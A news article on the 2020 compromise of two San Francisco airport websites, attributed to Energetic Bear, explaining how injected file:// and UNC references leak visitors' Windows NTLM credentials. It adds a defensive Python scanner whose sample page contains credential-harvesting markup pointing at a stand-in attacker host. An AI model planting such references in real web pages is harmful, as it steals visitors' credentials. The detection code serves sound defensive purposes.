A group of hackers linked to the Russian government is believed to be behind the cyberattack on the San Francisco International Airport (SFO) in March.
The Russian state-sponsored group called Energetic Bear, also known as DragonFly, reportedly targeted two of the airport’s websites to gain access to the potential victims’ Windows account information, according to security research firm ESET on Tuesday.
Energetic Bear has been active since 2010 and has focused primarily on organizations in the energy sector, mostly in the United States, Turkey and the Middle East. It is one of the most active Russian state-sponsored groups and has been identified in a number of widespread hacking campaigns with targets all over the globe, according to multiple Department of Homeland Security and Federal Bureau of Investigation reports.
ESET said on Twitter that “the targeted information was NOT the visitor’s credentials to the compromised websites, but rather the visitor’s own Windows credentials.”
Contrary to what several people reported, #ESETresearch assesses that this attack has no link with any Magecart credential stealer. The targeted information was NOT the visitor's credentials to the compromised websites, but rather the visitor's own Windows credentials. 2/2
— ESET research (@ESETresearch) April 14, 2020
Energetic Bear abused a long-known Windows behaviour rather than a software bug: when Internet Explorer on Windows loads a resource referenced by a file:// URL (or a \\host\share UNC path) that points at a remote SMB server, Windows automatically attempts NTLM authentication to that server, handing the attacker the visitor’s username and NTLM challenge-response (commonly called an NTLM hash). Those credentials can be cracked offline or relayed and then used for lateral movement, reconnaissance, data theft or sabotage, ZDNet reported.
“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” ESET research team added.
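The indicator to hunt for on your own web properties, then, is injected markup whose sub-resources point at a remote SMB host. The scanner below is an added example written for this article; it is not code from ESET, SFO or ZDNet, and it does not reproduce the actual code injected into the SFO sites. It parses HTML, pulls every URL from fetchable attributes, inline styles and style blocks, and reports those that would make Internet Explorer reach out over SMB: file://host/share, the four-slash file:////host/share form IE also accepts, and bare UNC paths. Local file:///C:/... and file://localhost references are deliberately ignored, since they carry no attacker host. The sample page and the host 203.0.113.10 (a reserved documentation address) are constructed for the example.

```python
"""Scan HTML for injected file:// or UNC references that would make Internet
Explorer on Windows leak NTLM credentials to a remote SMB host.

Added example for this article; the sample page below is constructed, not
the code found on the SFO sites.
"""
import re
from html.parser import HTMLParser

# Attributes that can carry a URL the browser will load (or, for href on <a>,
# load on click). <link href> and <img src> are fetched automatically.
URL_ATTRS = {"src", "href", "data", "background", "poster", "action"}

# \\host\share...  (bare UNC path; IE treats it like file://host/share)
UNC_RE = re.compile(r"\\\\([A-Za-z0-9._-]+)\\")
# url(...) inside CSS, with or without quotes
CSS_URL_RE = re.compile(r"""url\(\s*['"]?([^'")]+)['"]?\s*\)""", re.I)

LOCAL_HOSTS = {"", "localhost", "127.0.0.1"}


def smb_host(url):
    """Return the remote host an SMB-capable reference points at, else None.

    Handles file://host/share, file:////host/share and \\host\share.
    A reference with no host (file:///C:/...) cannot leak credentials to an
    attacker-controlled server, so it is not reported."""
    url = url.strip()
    m = UNC_RE.match(url)
    if m:
        return m.group(1).lower()
    if url.lower().startswith("file:"):
        rest = url[5:].lstrip("/")            # tolerate 2, 3 or 4 slashes
        host = re.split(r"[/\\]", rest, 1)[0].lower()
        if host in LOCAL_HOSTS or re.fullmatch(r"[a-z]:", host):
            return None                       # local path or drive letter
        return host
    return None


class LeakFinder(HTMLParser):
    """Collect (tag, attribute, url, host) for every remote SMB reference."""

    def __init__(self):
        super().__init__()
        self.hits = []
        self._in_style = False

    def handle_starttag(self, tag, attrs):
        if tag == "style":
            self._in_style = True
        for name, value in attrs:
            if value is None:
                continue
            if name in URL_ATTRS:
                self._check(tag, name, value)
            elif name == "style":             # inline CSS, e.g. background-image
                for u in CSS_URL_RE.findall(value):
                    self._check(tag, "style", u)

    def handle_endtag(self, tag):
        if tag == "style":
            self._in_style = False

    def handle_data(self, data):
        if self._in_style:                    # contents of a <style> block
            for u in CSS_URL_RE.findall(data):
                self._check("style", "css", u)

    def _check(self, tag, attr, url):
        host = smb_host(url)
        if host:
            self.hits.append((tag, attr, url, host))


def find_ntlm_leaks(html):
    """Parse one HTML document and return the list of SMB-leaking references."""
    parser = LeakFinder()
    parser.feed(html)
    parser.close()
    return parser.hits


# Constructed sample: a benign page with three injected SMB references and two
# file: references that are harmless because they name no remote host.
SAMPLE = r"""
<html><head>
<link rel="stylesheet" href="/css/site.css">
<style>body { background: url(file://203.0.113.10/share/bg.png); }</style>
</head><body>
<img src="/img/logo.png">
<img src="file:////203.0.113.10/share/pixel.png" width=1 height=1>
<a href="file:///C:/Users/Public/readme.txt">local file, no host</a>
<iframe src="\\203.0.113.10\share" style="display:none"></iframe>
<div style="background-image:url('file://localhost/share/x.png')"></div>
</body></html>
"""

if __name__ == "__main__":
    for tag, attr, url, host in find_ntlm_leaks(SAMPLE):
        print(f"<{tag} {attr}> -> {host}  ({url})")
```

Run against a saved copy of each page, or against your templates and any content stored in the CMS, and treat every hit as an injected reference to investigate. Finding the markup is only half the control: visitors are protected regardless of what a page contains when outbound TCP 445 is blocked at the network edge and Windows is configured to deny outgoing NTLM authentication to remote servers.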
The SFO confirmed in a memo on April 7 that the attack occurred, saying two of its websites, SFOConnect.com and SFOConstruction.com, were the targets of the cyberattack in March. SFOConnect.com is used by airport employees, while SFOConstruction.com is a portal used by airport construction contractors.
“The attackers inserted malicious computer code on these websites to steal some users’ login credentials,” the April 7 memo reads. “Users possibly impacted by this attack include those accessing these websites from outside the airport network through Internet Explorer on a Windows-based personal device or a device not maintained by SFO.”
The SFO added in the memo that the attackers “may have accessed” users’ usernames and passwords, which differs from ESET’s assessment on Tuesday that the target was visitors’ Windows credentials rather than their passwords for the sites. SFO officials recommend that all users who visited the two sites using Internet Explorer from outside the airport’s managed networks change their passwords.
Both sites are now back online. SFO forced a password reset for personnel on March 23, took the sites offline temporarily, and removed the malicious code from them.
Matthieu Faou, a malware researcher at ESET, told ZDNet that the technique used against SFO is one Energetic Bear/DragonFly has been using for years.
Asked if this attack is part of a new campaign aimed at the U.S. aviation sector, Faou said ESET doesn’t know of any other attacks on other airports’ websites.
“According to ESET telemetry, the other websites that were recently compromised are mainly media websites in Eastern Europe,” he added.